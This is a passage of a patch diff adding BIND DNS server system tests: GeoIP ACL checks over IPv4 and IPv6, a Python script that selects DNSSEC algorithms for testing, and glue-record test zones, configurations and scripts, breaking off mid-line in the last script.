$DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country code test" +fi + +echo_i "reloading server" +copy_setports ns2/named2.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database with nested ACLs using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database with nested ACLs using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country nested ACL test" +fi + +echo_i "reloading server" +copy_setports ns2/named3.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database by name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 country name test" +fi + +echo_i "reloading server" +copy_setports ns2/named4.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Country database by continent code using IPv4 ($n)" +ret=0 +lret=0 +# deliberately skipping 4 and 6 as they have duplicate continents +for i in 1 2 3 5 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by continent code using IPv6 ($n)" + ret=0 + lret=0 + # deliberately skipping 4 and 6 as they have duplicate continents + for i in 1 2 3 5 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 continent code test" +fi + +echo_i "reloading server" +copy_setports ns2/named5.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking City database by region code using IPv4 ($n)" +ret=0 +lret=0 +# skipping 2 on purpose here; it has the same region code as 1 +for i in 1 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking City database by region code using IPv6 ($n)" + ret=0 + lret=0 +# skipping 2 on purpose here; it has the same region code as 1 + for i in 1 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 region code test" +fi + +n=`expr $n + 1` +echo_i "reloading server" +copy_setports ns2/named6.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking City database by city name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking City database by city name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 city test" +fi + +echo_i "reloading server" +copy_setports ns2/named7.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking ISP database using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ISP database using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ISP test" +fi + +echo_i "reloading server" +copy_setports ns2/named8.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking ASN database by org name using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database by org name using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named9.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking GeoIP6 ASN database, ASNNNN only, using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database, ASNNNN only, using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named10.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking GeoIP6 ASN database, NNNN only, using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking ASN database, NNNN only, using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 ASN test" +fi + +echo_i "reloading server" +copy_setports ns2/named11.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking Domain database using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Domain database using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS6 txt example -b fd92:7065:b8e:ffff::$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break + done + [ $lret -eq 1 ] && ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` +else + echo_i "IPv6 unavailable; skipping IPv6 Domain test" +fi + +echo_i "reloading server" +copy_setports ns2/named12.conf.in ns2/named.conf +$CHECKCONF ns2/named.conf | cat_i +rndc_reload ns2 10.53.0.2 +sleep 3 + +n=`expr $n + 1` +echo_i "checking geoip blackhole ACL ($n)" +ret=0 +$DIG $DIGOPTS txt example -b 10.53.0.7 > dig.out.ns2.test$n || ret=1 +$RNDCCMD 10.53.0.2 status 2>&1 > rndc.out.ns2.test$n || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/get_algorithms.py b/bin/tests/system/get_algorithms.py new file mode 100755 index 0000000..529487a --- /dev/null +++ b/bin/tests/system/get_algorithms.py @@ -0,0 +1,243 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This script is a 'port' broker. It keeps track of ports given to the +# individual system subtests, so every test is given a unique port range. + +import logging +import os +from pathlib import Path +import platform +import random +import subprocess +import time +from typing import Dict, List, NamedTuple, Union + +# Uncomment to enable DEBUG logging +# logging.basicConfig( +# format="get_algorithms.py %(levelname)s %(message)s", level=logging.DEBUG +# ) + +STABLE_PERIOD = 3600 * 3 +"""number of secs during which algorithm selection remains stable""" + + +class Algorithm(NamedTuple): + name: str + number: int + bits: int + + +class AlgorithmSet(NamedTuple): + """Collection of DEFAULT, ALTERNATIVE and DISABLED algorithms""" + + default: Union[Algorithm, List[Algorithm]] + """DEFAULT is the algorithm for testing.""" + + alternative: Union[Algorithm, List[Algorithm]] + """ALTERNATIVE is an alternative algorithm for test cases that require more + than one algorithm (for example algorithm rollover).""" + + disabled: Union[Algorithm, List[Algorithm]] + """DISABLED is an algorithm that is used for tests against the + "disable-algorithms" configuration option.""" + + +RSASHA1 = Algorithm("RSASHA1", 5, 1280) +RSASHA256 = Algorithm("RSASHA256", 8, 1280) +RSASHA512 = Algorithm("RSASHA512", 10, 1280) +ECDSAP256SHA256 = Algorithm("ECDSAP256SHA256", 13, 256) +ECDSAP384SHA384 = Algorithm("ECDSAP384SHA384", 14, 384) +ED25519 = Algorithm("ED25519", 15, 256) +ED448 = Algorithm("ED448", 16, 456) + +ALL_ALGORITHMS = [ + RSASHA1, + RSASHA256, + RSASHA512, + ECDSAP256SHA256, + ECDSAP384SHA384, + ED25519, + ED448, +] + +ALGORITHM_SETS = { + "stable": AlgorithmSet( + default=ECDSAP256SHA256, alternative=RSASHA256, disabled=ECDSAP384SHA384 + ), + "ecc_default": AlgorithmSet( + default=[ + ECDSAP256SHA256, + ECDSAP384SHA384, + ED25519, + ED448, + ], + alternative=RSASHA256, + disabled=RSASHA512, + ), + # FUTURE The system tests needs more work before they're ready for this. + # "random": AlgorithmSet( + # default=ALL_ALGORITHMS, + # alternative=ALL_ALGORITHMS, + # disabled=ALL_ALGORITHMS, + # ), +} + +TESTCRYPTO = Path(__file__).resolve().parent / "testcrypto.sh" + +KEYGEN = os.getenv("KEYGEN", "") +if not KEYGEN: + raise RuntimeError("KEYGEN environment variable has to be set") + +ALGORITHM_SET = os.getenv("ALGORITHM_SET", "stable") +assert ALGORITHM_SET in ALGORITHM_SETS, f'ALGORITHM_SET "{ALGORITHM_SET}" unknown' +logging.debug('choosing from ALGORITHM_SET "%s"', ALGORITHM_SET) + + +def is_supported(alg: Algorithm) -> bool: + """Test whether a given algorithm is supported on the current platform.""" + try: + subprocess.run( + f"{TESTCRYPTO} -q {alg.name}", + shell=True, + check=True, + env={ + "KEYGEN": KEYGEN, + "TMPDIR": os.getenv("TMPDIR", "/tmp"), + }, + stdout=subprocess.DEVNULL, + ) + except subprocess.CalledProcessError as exc: + logging.debug(exc) + logging.info("algorithm %s not supported", alg.name) + return False + return True + + +def filter_supported(algs: AlgorithmSet) -> AlgorithmSet: + """Select supported algorithms from the set.""" + filtered = {} + for alg_type in algs._fields: + candidates = getattr(algs, alg_type) + if isinstance(candidates, Algorithm): + candidates = [candidates] + supported = list(filter(is_supported, candidates)) + if len(supported) == 1: + supported = supported.pop() + elif not supported: + raise RuntimeError( + f'no {alg_type.upper()} algorithm from "{ALGORITHM_SET}" set ' + "supported on this platform" + ) + filtered[alg_type] = supported + return AlgorithmSet(**filtered) + + +def select_random(algs: AlgorithmSet, stable_period=STABLE_PERIOD) -> AlgorithmSet: + """Select random DEFAULT, ALTERNATIVE and DISABLED algorithms from the set. + + The algorithm selection is deterministic for a given time period and + platform. This should make potential issues more reproducible. + + To increase the likelyhood of detecting an issue with a given algorithm in + CI, the current platform is used as a randomness source. When testing on + multiple platforms at the same time, this ensures more algorithm variance + while keeping reproducibility for a single platform. + + The function also ensures that DEFAULT, ALTERNATIVE and DISABLED algorithms + are all different. + """ + # FUTURE Random selection of ALTERNATIVE and DISABLED algorithms needs to + # be implemented. + alternative = algs.alternative + disabled = algs.disabled + assert isinstance( + alternative, Algorithm + ), "ALTERNATIVE algorithm randomization not supported yet" + assert isinstance( + disabled, Algorithm + ), "DISABLED algorithm randomization not supported yet" + + # initialize randomness + now = time.time() + time_seed = int(now - now % stable_period) + seed = f"{platform.platform()}_{time_seed}" + random.seed(seed) + + # DEFAULT selection + if isinstance(algs.default, Algorithm): + default = algs.default + else: + candidates = algs.default + for taken in [alternative, disabled]: + try: + candidates.remove(taken) + except ValueError: + pass + assert len(candidates), "no possible choice for DEFAULT algorithm" + random.shuffle(candidates) + default = candidates[0] + + # Ensure only single algorithm is present for each option + assert isinstance(default, Algorithm) + assert isinstance(alternative, Algorithm) + assert isinstance(disabled, Algorithm) + + assert default != alternative, "DEFAULT and ALTERNATIVE algorithms are the same" + assert default != disabled, "DEFAULT and DISABLED algorithms are the same" + assert alternative != disabled, "ALTERNATIVE and DISABLED algorithms are the same" + + return AlgorithmSet(default, alternative, disabled) + + +def algorithms_env(algs: AlgorithmSet) -> Dict[str, str]: + """Return environment variables with selected algorithms as a dict.""" + algs_env: Dict[str, str] = {} + + def set_alg_env(alg: Algorithm, prefix): + algs_env[f"{prefix}_ALGORITHM"] = alg.name + algs_env[f"{prefix}_ALGORITHM_NUMBER"] = str(alg.number) + algs_env[f"{prefix}_BITS"] = str(alg.bits) + + assert isinstance(algs.default, Algorithm) + assert isinstance(algs.alternative, Algorithm) + assert isinstance(algs.disabled, Algorithm) + + set_alg_env(algs.default, "DEFAULT") + set_alg_env(algs.alternative, "ALTERNATIVE") + set_alg_env(algs.disabled, "DISABLED") + + logging.info("selected algorithms: %s", algs_env) + return algs_env + + +def main(): + disable_checking = int(os.getenv("DISABLE_ALGORITHM_SUPPORT_CHECKING", "0")) + try: + algs = ALGORITHM_SETS[ALGORITHM_SET] + if not disable_checking: + algs = filter_supported(algs) + algs = select_random(algs) + algs_env = algorithms_env(algs) + except Exception: + # if anything goes wrong, the conf.sh ignores error codes, so make sure + # we set an environment variable to an error value that can be checked + # later by run.sh + print("export ALGORITHM_SET=error") + raise + for name, value in algs_env.items(): + print(f"export {name}={value}") + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/glue/clean.sh b/bin/tests/system/glue/clean.sh new file mode 100644 index 0000000..4d84f06 --- /dev/null +++ b/bin/tests/system/glue/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after glue tests. +# + +rm -f dig.out +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/glue/fi.good b/bin/tests/system/glue/fi.good new file mode 100644 index 0000000..a08bc7a --- /dev/null +++ b/bin/tests/system/glue/fi.good @@ -0,0 +1,27 @@ + +; <<>> DiG 9.0 <<>> +norec @10.53.0.1 -p 5300 foo.bar.fi. A +;; global options: printcmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58772 +;; flags: qr ad; QUERY: 1, ANSWER: 0, AUTHORITY: 6, ADDITIONAL: 7 + +;; QUESTION SECTION: +;foo.bar.fi. IN A + +;; AUTHORITY SECTION: +fi. 172800 IN NS NS.EU.NET. +fi. 172800 IN NS NS.TELE.fi. +fi. 172800 IN NS PRIFI.EUNET.fi. +fi. 172800 IN NS NS.UU.NET. +fi. 172800 IN NS T.NS.VERIO.NET. +fi. 172800 IN NS HYDRA.HELSINKI.fi. + +;; ADDITIONAL SECTION: +NS.TELE.fi. 172800 IN A 193.210.19.19 +NS.TELE.fi. 172800 IN A 193.210.18.18 +PRIFI.EUNET.fi. 172800 IN A 193.66.1.146 +NS.UU.NET. 172800 IN A 137.39.1.3 +T.NS.VERIO.NET. 172800 IN A 192.67.14.16 +HYDRA.HELSINKI.fi. 172800 IN A 128.214.4.29 +NS.EU.NET. 172800 IN A 192.16.202.11 + diff --git a/bin/tests/system/glue/noglue.good b/bin/tests/system/glue/noglue.good new file mode 100644 index 0000000..22eca7b --- /dev/null +++ b/bin/tests/system/glue/noglue.good @@ -0,0 +1,14 @@ + +; <<>> DiG 9.0 <<>> @10.53.0.1 -p 5300 example.net a +;; global options: printcmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29409 +;; flags: qr rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 0 + +;; QUESTION SECTION: +;example.net. IN A + +;; AUTHORITY SECTION: +example.net. 300 IN NS ns2.example. +example.net. 300 IN NS ns1.example. + diff --git a/bin/tests/system/glue/ns1/named.conf.in b/bin/tests/system/glue/ns1/named.conf.in new file mode 100644 index 0000000..4d1ef75 --- /dev/null +++ b/bin/tests/system/glue/ns1/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "root-servers.nil" { + type primary; + file "root-servers.nil.db"; +}; +zone "net" { + type primary; + file "net.db"; +}; diff --git a/bin/tests/system/glue/ns1/net.db b/bin/tests/system/glue/ns1/net.db new file mode 100644 index 0000000..db784cc --- /dev/null +++ b/bin/tests/system/glue/ns1/net.db @@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN net. +$TTL 300 +@ IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS a.root-servers.nil. + +; FI. authoritative servers, for the FI. glue test. +uu.net. NS ns.uu.net. +NS.UU.NET. 172800 IN A 137.39.1.3 +eu.net. NS ns.eu.net. +NS.EU.NET. 172800 IN A 192.16.202.11 + +; Referral outside of server authority, but with glue records present. +; Don't hand out the glue. +example.net. NS ns1.example. +example.net. NS ns2.example. +ns1.example. 172800 IN A 1.1.1.1 +ns2.example. 172800 IN A 2.2.2.2 diff --git a/bin/tests/system/glue/ns1/root-servers.nil.db b/bin/tests/system/glue/ns1/root-servers.nil.db new file mode 100644 index 0000000..1475aed --- /dev/null +++ b/bin/tests/system/glue/ns1/root-servers.nil.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3600 + ) + NS a +a A 10.53.0.1 +b A 10.53.0.2 + + + diff --git a/bin/tests/system/glue/ns1/root.db b/bin/tests/system/glue/ns1/root.db new file mode 100644 index 0000000..debdf01 --- /dev/null +++ b/bin/tests/system/glue/ns1/root.db @@ -0,0 +1,44 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. + +root-servers.nil. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +; Delegate some domains that contain name servers for the sample +; ccTLDs below. +net. 172800 IN NS a.root-servers.nil. + +; +; A sample ccTLD +; +fi. 172800 IN NS NS.TELE.fi. +fi. 172800 IN NS PRIFI.EUNET.fi. +fi. 172800 IN NS NS.UU.NET. +fi. 172800 IN NS T.NS.VERIO.NET. +fi. 172800 IN NS HYDRA.HELSINKI.fi. +fi. 172800 IN NS NS.EU.NET. +NS.TELE.fi. 172800 IN A 193.210.18.18 +NS.TELE.fi. 172800 IN A 193.210.19.19 +PRIFI.EUNET.fi. 172800 IN A 193.66.1.146 +NS.UU.NET. 172800 IN A 137.39.1.3 +T.NS.VERIO.NET. 172800 IN A 192.67.14.16 +HYDRA.HELSINKI.fi. 172800 IN A 128.214.4.29 +NS.EU.NET. 172800 IN A 192.16.202.11 diff --git a/bin/tests/system/glue/setup.sh b/bin/tests/system/glue/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/glue/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/glue/tests.sh b/bin/tests/system/glue/tests.sh new file mode 100644 index 0000000..c122c5e --- /dev/null +++ b/bin/tests/system/glue/tests.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# +# Do glue tests. +# + +DIGOPTS="+norec -p ${PORT}" + +status=0 + +echo_i "testing that a ccTLD referral gets a full glue set from the root zone" +$DIG $DIGOPTS @10.53.0.1 foo.bar.fi. A >dig.out || status=1 +digcomp --lc fi.good dig.out || status=1 + +echo_i "testing that we don't find out-of-zone glue" +$DIG $DIGOPTS @10.53.0.1 example.net. a > dig.out || status=1 +digcomp noglue.good dig.out || status=1 + +echo_i 